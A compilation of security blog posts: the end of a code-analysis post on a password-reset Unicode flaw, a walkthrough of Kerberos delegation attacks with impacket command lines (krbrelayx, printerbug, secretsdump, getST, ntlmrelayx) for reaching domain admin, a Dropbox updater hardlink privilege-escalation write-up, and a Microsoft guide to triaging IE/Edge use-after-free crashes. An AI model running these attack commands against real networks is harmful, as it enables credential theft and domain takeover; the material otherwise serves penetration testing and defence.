    "[\"/loggedUsers\"]",
    "org.baeldung.web.controller.UserController.getLoggedUsers:java.lang.String(java.util.Locale,org.springframework.ui.Model)"
  ),
  RouteMapping(
    "[\"/user/resetPassword\"]",
    "org.baeldung.web.controller.RegistrationController.resetPassword:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)"
  ),
  RouteMapping(
    "[\"/user/registrationCaptcha\"]",
    "org.baeldung.web.controller.RegistrationCaptchaController.captchaRegisterUserAccount:org.baeldung.web.util.GenericResponse(org.baeldung.web.dto.UserDto,javax.servlet.http.HttpServletRequest)"
  ),
  RouteMapping(
    "[\"/user/savePassword\"]",
    "org.baeldung.web.controller.RegistrationController.savePassword:org.baeldung.web.util.GenericResponse(java.util.Locale,org.baeldung.web.dto.PasswordDto)"
  ),
  RouteMapping(
    "[\"/user/registration\"]",
    "org.baeldung.web.controller.RegistrationController.registerUserAccount:org.baeldung.web.util.GenericResponse(org.baeldung.web.dto.UserDto,javax.servlet.http.HttpServletRequest)"
  ),
  RouteMapping(
    "[\"/user/update/2fa\"]",
    "org.baeldung.web.controller.RegistrationController.modifyUser2FA:org.baeldung.web.util.GenericResponse(boolean)"
  ),
  RouteMapping(
    "[\"/user/resetPasswordBad\"]",
    "org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)"
  )
)

At this stage we have extracted the attack surface and identified all controller functions mapped to exposed routes. Let us proceed to next step.

This route particularly is of interest to us is

RouteMapping( “[\”/user/resetPasswordBad\”]”, “org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)” )

CONDITION #1 : Attacker controlled vector (email) with unicode in local part is case folded and then passed to database validation routine

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

// The DB lookup function is a part of the IUserService interface, implemented by UserService here https://github.com/conikeec/spring-security-registration/blob/master/src/main/java/org/baeldung/service/UserService.java#L136
val DB_LOOKUP_FN_EXPR = ".*findUserByEmail.*"

//define the sink function that participates in the data flow
val sink = cpg.method.name(DB_LOOKUP_FN_EXPR).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW check to determine if attack controller vector (email) is caseFolded prior to DB lookup
sink.reachableBy(source).flows.passes(_.isCall.name(".*toLowerCase.*")).p

  """ _____________________________________________________________________________________________________________________
 | tracked                | lineNumber| method               | file                                                   |
 |====================================================================================================================|
 | userEmail              | 134       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | userEmail              | 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | this                   | N/A       | toLowerCase          | java/lang/String.java                                  |
 | ret                    | N/A       | toLowerCase          | java/lang/String.java                                  |
 | userEmail.toLowerCase()| 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | param1                 | N/A       | .assignment| N/A                                                    |
 | param0                 | N/A       | .assignment| N/A                                                    |
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | param0                 | N/A       | findUserByEmail      | org/baeldung/service/IUserService.java                 |
"""

CONDITION #2 : If condition #1 passes, a reset token of a registered user is sent to attacker controlled email (with embedded unicode character)

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

//define email channel sink function name
val EMAIL_CHANNEL_SINK="org.springframework.mail.javamail.JavaMailSender.send:void(org.springframework.mail.SimpleMailMessage)"

//define the sink function that participates in the data flow
val sink = cpg.method.fullNameExact(EMAIL_CHANNEL_SINK).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW check to determine if attack controller vector (email) is used in emailSend function, rather than the registered user email (determined after fetch from DB in step #1)
sink.reachableBy(source).flows.p

//results
res58: List[String] = List(
  """ __________________________________________________________________________________________________________________________________________________________________
 | tracked                                                       | lineNumber| method                     | file                                                   |
 |=================================================================================================================================================================|
 | userEmail                                                     | 134       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 213       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 217       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | param0                                                        | N/A       | setTo                      | org/springframework/mail/SimpleMailMessage.java        |
 | this                                                          | N/A       | setTo                      | org/springframework/mail/SimpleMailMessage.java        |
 | email                                                         | 217       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/SimpleMailMessage.java        |
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/SimpleMailMessage.java        |
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | email                                                         | 219       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | ret                                                           | 213       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | this.constructEmailBad("Reset Password",$r11,userEmail)       | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | param1                                                        | N/A       | .assignment      | N/A                                                    |
 | param0                                                        | N/A       | .assignment      | N/A                                                    |
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | ret                                                           | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | this.constructResetTokenEmailBad($r9,$r10,token,$l0,userEmail)| 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | param1                                                        | N/A       | .assignment      | N/A                                                    |
 | param0                                                        | N/A       | .assignment      | N/A                                                    |
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | param0                                                        | N/A       | send                       | org/springframework/mail/javamail/JavaMailSender.java  |
"""
)

Safe Coding to prevent this business logic flaw

  1. Observe for anomalous volume of password resets (forgot password requests) initiated upon your application. An attacker is most likely enumerating your end point.
  2. Use two factor authentication (2FA) as a part of validation and reset functions.
  3. As John Gracey suggests, use punycode conversion as a part of your registration, validation and reset functions. Validate for both, local and domain part of email addresses.
  4. Continuously verify your entire fleet of applications in a CI/CD pipeline to ensure that none of the conditions above are violating baseline checks in any current and future releases.
  5. Send out password reset email ONLY to the original email address that was used to create the account and NOT to email address controlled by attacker.

ShiftLeft is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditionsbusiness logic flaws and insider attacks that might exist in your application’s codebase.

If you’d like to learn more about ShiftLeft, please request a demo.

Stay Safe!

No Shells Required — a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

Original text by Red XOR Blue

There are a ton of great resources that have been released in the past few years on a multitude of Kerberos delegation abuse avenues.  However, most of the guidance out there is pretty in-depth and/or focuses on the usage of @Harmj0y’s Rubeus.  While Rubeus is a super well-written tool that can do quite a few things extremely well, in engagements where I’m already running off of a primarily Linux environment, having tools that function on that platform can be beneficial.  To that end, all the functionality we need to perform unconstrained, constrained, and resource-based constrained delegation attacks is already available to us in the impacket suite of tools.
This post will cover how to identify potential delegation attack paths, when you would want to use them, and give detailed walkthroughs of how to perform them on a Linux platform.  What we won’t be covering in this guide is a detailed background of Kerberos authentication, or how various types of delegation work in-depth, as there are some really great articles already out that go into a ton of detail on the inner-workings of the protocol.  If you are interested in a deeper dive, the most comprehensive & enlightening post I’ve read is @Elad_Shamir’s write-up: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

Unconstrained Delegation


What Is It?

Back in the early days of Windows Active Directory (pre-Server 2003) this was really the only way to delegate access, which at a high level effectively means configuring a service with privileges to impersonate users elsewhere on the network.  Unconstrained Delegation would be used for something like a front-end web server that needed to take in requests from users, and then impersonate those users to access their data on a second database server.  

Unfortunately, as the name implies, these impersonation rights were not limited to a single system or service, but rather allowed a configured account to impersonate anyone that authenticated against it anywhere on the network.  This is due to the fact that when an object authenticates to a service tied to an account configured with unconstrained delegation, they send the remote service a copy of their TGT (Ticket Granting Ticket), which allows the remote system to generate new TGS (Ticket Granting Service / service ticket) requests at-will.  These TGS’ are used for authenticating to Kerberos-enabled services across the network, meaning that if you possess an object’s TGT you can impersonate them anywhere on the network where you can authenticate with Kerberos.

When To Use:

If you can gain access to an account (user or computer) that is configured with unconstrained delegation.  To identify users & computers configured with unconstrained delegation I use pywerview, a python port of a good chunk of powerview’s functionality (https://github.com/the-useless-one/pywerview) but feel free to use whatever tools works best for you. This tool has handy flags to pull both accounts configured with both constrained + unconstrained delegation.  In this case what we’re really looking for is any user or computer with a UserAccountControl attribute that includes ‘TRUSTED_FOR_DELEGATION’.  All we’ll need at this point is a set of creds for AD to allow us to do the enumeration.  Taking a look at the output of the check we ran below, we can see that the user ‘unconstrained’ is configured with unconstrained delegation:

If you have find you have access to a computer object that is configured with unconstrained delegation, it may be easier simply to perform the print spooler attack and extract the ticket from memory using Rubeus, as detailed here: https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1.  However, if you have access to a user account configured with delegation or would prefer to avoid running code on remote systems as much as possible, the following should be helpful.

Process Walkthrough:

Note: This section is pretty much a direct walkthrough of the awesome work @_dirkjan wrote up in his blog here: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ If you’re familiar with this style of attack it’s nothing new, just a (hopefully) fairly straightforward walkthrough of the path that I’ve had the most success with on engagements after identifying unconstrained delegation.
If we do end up identifying any user accounts configured with unconstrained delegation, we’ll want to obtain Kerberos tickets we can attempt to crack.  For an account to be configured with delegation, they also need to be configured with an SPN (Service Principal Name).  This means that we should be able to retrieve a crackable Kerberos ticket for the account using GetUserSPNs.py

GetUserSPNs.py DOMAIN/USER:PASSWORD -request-user UNCONSTRAINED_USER

Assuming we’re able to recover the password for an account / used another method to get admin access on a computer configured with unconstrained delegation, we can now move on to attempting to leverage this access to get DA on the network.  We’ll start by attempting to add an SPN to the account we have access to. This is the only part of the attack that will require non-default settings to be configured (for a user account), but per all the sql devs on stack exchange asking how to enable it, it seems to be something that should be commonly turned on already.  If we have access to a computer account configured with unconstrained delegation, we can use the ‘Validated write to DNS host name’ security attribute (configured by default) to add an additional hostname to the object, which will automatically configure new SPN’s that will also be configured with unconstrained delegation. We then just have to create a new DNS record to point that new hostname to us.
We’ll be using dirk-jan’s krbrelayX toolkit for the rest of this process (https://github.com/dirkjanm/krbrelayx), first using addspn.py to attempt to add a ‘host’ spn for a nonexistent system on the network.  Note – it is important to ensure when you’re adding an SPN you use the fqdn of the network, not just the hostname.  You’ll see one of two messages, based on if your account has privileges to modify its own SPN’s (above = an account with appropriate attributes set, below = attribute not set).

addspn.py -u DOMAIN\\USER -p PASSWORD -s host/FAKESYSTEM.FQDN ldap://DC.FQDN

If you don’t have privileges, this is pretty much the end of this potential vector, although I would still recommend targeting the systems(s) on which the account has SPN’s configured for, as they likely have TGT’s in-memory.
However, if we are able to successfully add an SPN for a non-existent system we can keep going.  Next, we’ll want to add a DNS record for this same non-existent system that links back to our system’s IP, effectively turning our system into this non-existent system.  Due to the actions we took in the last step (creating an SPN for the ‘host’ service with our user configured with unconstrained delegation on this non-existent hostname that now points to our system), we are basically creating a new ‘computer’ on the network that has unconstrained delegation configured on the ‘host’ service on it. 
We’ll be using another part of the krbrelayx toolkit, dnstool.py, to complete this step to create a new DNS record and then point it at the IP of our attack box (Note: dns records take ~3 minutes to update, so don’t worry if you complete this step and cant immediately ping / nslookup your new host):

dnstool.py -u DOMAIN\\USERNAME -p PASSWORD -r FAKESYSTEM.FQDN -a add -d YOUR_IP DC_HOSTNAME

Everything should be ready to go now, we’ll execute the print spooler bug to force the DC$ account to attempt to authenticate to the host service of our new ‘computer’ that is configured with unconstrained delegation.  This will in turn cause the DC to provide a copy of its TGT when authenticating, which we can then use to impersonate it on any other Kerberos-enabled service.  In one window we’ll set up krbrelayx.py as follows: **This is very important**  the krbsalt is the FQDN of the domain in ALL CAPS, followed immediately by the username (case-sensitive).  The Krbpass is the user’s password, nothing crazy there.

krbrelayx.py --krbsalt DOMAIN.FQDNUsernameCaseSensitive --krbpass PASSWORD

Once you have that running in one window, we’ll use the final tool within the krbrelayx toolkit to kick off the attack (Note: The user used to kick off the attack doesn’t matter, it can be any domain user).  The below shows what the successful attack looks like:

printerbug.py DOMAIN/USERNAME:PASSWORD@DC_HOSTNAME FAKE_SYSTEM.FQDN

On our krbrelayx window, we should see that we have gotten an inbound connection, and have obtained a tgt (formatted as .ccache) file for the DC$ account:

At this point, we just need to export the ticket we received into memory, after which we should be able to run secretsdump against the DC:

export KRB5CCNAME=CCACHE_FILE.CCACHE

secretsdump.py -k DC_Hostname -just-dc





Constrained Delegation


What Is It?

Microsoft’s next iteration of delegation included the ability to limit where objects had delegation (impersonation) rights to.  Now a front-end web server that needed to impersonate users to access their data on a database could be restricted; allowing it to only impersonate users on a specific service & system.  However, as we will find out, the portion of the ticket that limits access to a certain service is not encrypted.  This gives us some room to gain additional access to systems if we gain access to an object configured with these rights.

When To Use:

If you can gain access to an account (user or computer) that is configured with constrained delegation.  You can find this by searching for the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ value in the UserAccountControl attribute of AD objects.  This can be also be found through the use of Pywerview, as outlined in the above section.

Process Walkthrough:

This time, we’ll start by targeting another account, httpDelegUser.  As we can see from our initial enumeration with Pywerview, this account has the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ flag set.  We can also check the contents of the account’s msDS-AllowedToDelegateTo attribute to determine that it has delegation privileges to the www service on Server02.  Not the worst thing in the world, but probably not going to get us a remote shell.

Also a quick recap of the account’s group memberships:

To start this attack, we’ll use another impacket tool – getST.py – to retrieve a ticket for an impersonated user to the service we have delegation rights to (the www service on server02 in this case).  In this example we’ll impersonate ‘bob’, a domain admin in this environment.  Note: If a user is marked as ‘Account is sensitive and cannot be delegated’ in AD, you will not be able to impersonate them.

getST.py -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD

From here, the initial assumption would be that we could only authenticate against the www service on server02 with this ticket.  However, Alberto Solino discovered that the service name portion of the ticket (sname) is not actually a protected part of the ticket.  This allows us to change the sname to any value we want, as long as its another service running under the same account as the original one we have delegation rights to.  For example, if our account (httpDelegUser) has delegation rights to a service that the server02 computer object is running (example SPN: www/server02), we can change our sname to any other SPN associated with server02 (ex. cifs/server02).  His blog on the mechanism by which this occurs is super insightful, and worth a read:  https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
Even better for us, as Alberto Solino is one of the primary writers of impacket, he built this logic in so that these sname conversions happen automatically for us on the back-end:

From an operational standpoint, what this means is that the ticket for the www service we obtained in the step above can be loaded into memory and used to use just about any of the impacket suite of tools to run commands, dump SAM, etc.



Resource-Based Constrained Delegation


What Is It?

Note: Microsoft is releasing an update in January 2020 that will enable LDAP channel binding & LDAP signing by default on Windows systems, remediating this potential attack vector on fully patched systems. 

Starting with Windows Server 2012, objects in AD could set their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, effectively allowing objects to set what remote objects had rights to delegate to them.  This allows those remote objects with delegation rights to impersonate any account in AD to any service on the local system.  Therefore, if we can convince a remote system to add an object that we control to their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, we can use it to impersonate any other user not marked as ‘Account is sensitive and cannot be delegated’ on it.

When To Use:

Basically, when you’re on a network and want to get a shell on a different system on that same network segment.  This attack can be ran without needing any prior credentials, as described by @_dirkjan in his blog here: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ .  However, the method described does require that a domain controller in the environment is configured with LDAPS; which seems to be somewhat uncommon based on the environments I’ve tested against over the past 6 months.           

I’ll focus on a secondary scenario for this attack – one where you have compromised a standard low-privilege user account (no admin rights) or a computer account, and are on a network segment with other systems you want to compromise.

Process Walkthrough:

To begin with, what this attack really needs is *some* sort of account that is configured with an SPN.  This can be a computer account, a user account that is already configured with an SPN, or can be a computer account we create using a non-privileged user account by taking advantage of a default MachineAccountQuota configuration (https://blog.netspi.com/machineaccountquota-is-useful-sometimes/).  We need an account that is configured with an SPN as this is a requirement if we want the TGS produced by S4U2Self to be forward-able (Read more why this is necessary here: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#a-misunderstood-feature-1).  Computer accounts work as by default they are configured with a variety of SPN’s for all their various Kerberos-enabled services.
So, in our example let’s say we only have a low privilege account (we’ll use the ‘tim’ account). 

The first step in the process would be to try and create a computer account, so that we could gain control of an account configured with SPN’s.  To do this, we’ll use a relatively new impacket example script – addcomputer.py.  This script has a SAMR option to add a new computer, which functions over SMB and uses the same mechanism as when a new computer is added to a domain using the Windows GUI.

addcomputer.py -method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD

After running this command, your new computer object will be added to AD (Note: this example script was not fully working for me in python2.7 – the computer object was added but its password was not being appropriately set.  It does work using Python3.6 though.)

This script was released fairly recently, prior to it I used PowerMad.ps1 from a Windows VM to perform the same actions.  This tool uses a standard LDAP connection vs. SAMR, but the end result is the same.  For further info on PowerMad I recommend the following: https://github.com/Kevin-Robertson/Powermad
If this part of the attack didn’t work, the default MachineAccountQuota has likely been changed for users in the environment.  In that case you’ll need to use alternative methods to obtain a computer account / user account configured with an SPN.  However, once you have that, you can continue to proceed as described below.
For the next part of the attack we’ll be using mitm6 + ntlmrelayx.  Unlike a traditional NTLM relay attack, really what we’re interested in is intercepting machine account hashes, as we can forward them to LDAP on a domain controller.  This allows us to impersonate the relayed computer account and set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to include the computer object that we control.  Note: We unfortunately can’t relay SMB to LDAP due to the NTLMSSP_NEGOTIATE_SIGN flag set on SMB traffic, so will be focusing on intercepting HTTP traffic, such as windows update requests. 
We’ll first set up ntlmrelayx to delegate access to the computer account we just made & have control of (rbcdTest): 

ntlmrelayx.py -wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DOMAIN_CONTROLLER

We next start a relay attack using mitm6.py or other relay tool, and wait for requests to start coming in.  Eventually you should see something that looks like the following:

In the above screenshot we can see that we successfully relayed the incoming auth request made by the server02$ account to LDAP on the domain controller and modified the object’s privileges to give rbcdTest$ impersonation rights on the system.
Once we have delegation rights, the rest of the attack is fairly straightforward.  We’ll use another impacket tool – getST.py – to create the TGS necessary to connect to Server02 using an impersonated identity.
This tool will get us a Kerberos service ticket (TGS) that is valid for a selected service on the remote system we relayed to LDAP (Server02).  As the rbcdTest$ account has delegation rights on this system, we are able to impersonate any user that we want, in this case choosing to impersonate ‘administrator’, a domain admin on the testlab.local network.

getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT  DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD

With the valid ticket saved to disk, all we need to do is export it to memory, which will then allow us to remotely connect to the remote system with administrative privileges:

From dropbox(updater) to NT AUTHORITY\SYSTEM

Original text by @decoder_it

Hardlinks again! Yes, there are plenty of opportunities to raise your privileges due to incorrect permissions settings when combined with  hardlinks in many softwares (MS included) 

In this post I’m going to show how to use the DropBoxUpdater  service in order to get SYSTEM privileges starting from a simple Windows user. I found and exploited this “vulnerability”  along with my usual “business partner” @padovah4ck.

Please note:  I’m not going to release any source code,  my goal is to share knowledge, not tools.

The DropBoxUpdater is part of the Dropbox Client Software suite, and according to the Software manufacturer, it is used for keeping the client up-to-date:

cattura

The updater is installed as a service and 2 scheduled tasks, and to be honest,  I really don’t know why… but let’s go on. Keep in mind that in standard installations they run as SYSTEM  and one of the dropboxupdate task is run every hour by the task scheduler.

task

Each time dropboxupdate is  triggered, it writes log files in this directory:

  • c:\ProgramData\Dropbox\Update\Log

Permissions are the following:

cattura.JPG

As you can see, users can add file in this directory.

Logfiles have a special format:

cattura.JPG

And the file naming convention is:
DropboxUpdate.log-<YYYY>-<MM>-<DD>-<HH>-<MM>-<SEC>-<MILLISEC>-<PID>

Users can overwrite and delete these files:

cattura

Even more interesting is a SetSecurity call made by SYSTEM on these files:

setsec

Seems familiar, isn’t it? If you read my previous post, you already know that this is exploitable via “hardlinks

But we have a problem here, we have to “guess” the logfile name,  that is the exact time (including milliseconds) and the PID of the updater process

Seems challenging!

After some testing we found this solution:

  • Be sure that no process “DropBoxUpdate.exe” is running (as standard user:
    c:\>tasklist | find /I “dropboxupdate”)
  • Intercept the DropBoxUdate.exe process upon startup by setting an opportunistic
    exclusive lock on the following DLL:
    • C:\Program Files(x86)\Dropbox\Update\1.3.241.1\goopdate.dll
  • The process will hang and the user defined callback function will be triggered
  • Find the PID of the dropboxupdate process
  • Perform an “hardlink spraying” by creating 999 links with the naming convention
    mentioned before, starting from the current time (hhmmss) + 10 seconds (timeA).
  • All these links are pointing to destination file we want to own. It is possible to set at
    maximum of 1024 hardlinks to a file.
  • Wait until current time (hhmmss) is equal to timeA
  • Release the oplock
  • If everything works fine, we should match the correct file name in the range of 999 milliseconds.

Will it work? We have just to try it out, with the classic license.rtf  located in System32 folder. For testing purpose, you can directly invoke the scheduled task with admin rights instead of waiting the next hourly run.

cattura.JPG

Wow! It worked. Now you could overwrite any file where SYSTEM has full control.. and gain the highest privileges!

But let’s go a step further… would it be possible to rely only on Dropbox Client software to gain a SYSTEM shell?

Yes, of course! Remember the second scheduled task?

cattura.JPG
cattura.JPG

The task runs with SYSTEM privileges and is also triggered at the logon of any user. During our test we noticed that during the logon,  the DropboxCrashHandler.exe was also invoked (only if no other dropboxupdate process is running in other sessions):

Capture.JPG

So what was our idea? Set DropboxCrashHandler.exe  as target file, launch the exploit, overwrite the file with our “malicious” executable, logoff, logon again and our executable should be triggered!

Here you can watch the working POC. I presume that there are other possible escalation paths, it’s left up to you 

BOUNDARY CONDITIONS

  • Dropbox has to be installed in “standard” way, with admin rights
  • We tested it with the latest Windows Dropbox Client release (87.4.138 at the time of writing)

DISCLOSURE TIMELINE

We informed Dropbox about this issue on September, 18th. They answered that they were aware about the issue (but not with these techniques and complete escalation paths) and would fix it before the end of October. Since 90 days have passed before initial submission, I published the post.

POSSIBLE COUNTERMEASURES

Waiting for the new (hopefully  patched) release, meantime you could remove the “Create files” / write data” and the “Create folders /append data” permissions for “Users” on the  Log folder and you should be fine 

SIDE NOTE

Generic hardlink “abuse” will no more work in future releases of Windows. In the latest “Insider” previews, MS has added some supplementary checks, so if you don’t have write access to the destination file you get an access denied error when you try to create a hardlink.

Triaging the exploitability of IE/EDGE crashes

Original text by swiat

Introduction

Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability.  To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.

 

Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-orientated software. They are caused when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into 3 classes based upon where the dangling pointer is stored: the stack, heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage. 

 

Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.

 

Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents is zero wrote, and it is placed in a queue. Once the queue has reached a threshold size, we then begin the process of seeing if it is safe to free each object instance in the queue.
  2. To test to see if it is safe to free an object instance, we scan both the registers and all pointer aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm delays the potential freeing of the object to a later point in time, is controllable by an attacker, and as such is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that has been zero wrote, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:

Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_8, we consider this case as not-exploitable since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.

MemGC

MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion as MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC will zero write upon free and will delay the actual free until garbage collection is triggered and no references to the freed object are found.

Just like MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereferences or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zero wrote as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.

Conclusions

In conclusion these new mitigations dramatically enhance the security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE & Edge, the behavior of these mitigations needs to be taken into account in order to determine the exploitability of these issues.

Acknowledgments

We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden.  MSRC Engineering, Vulnerabilities & Mitigations Team.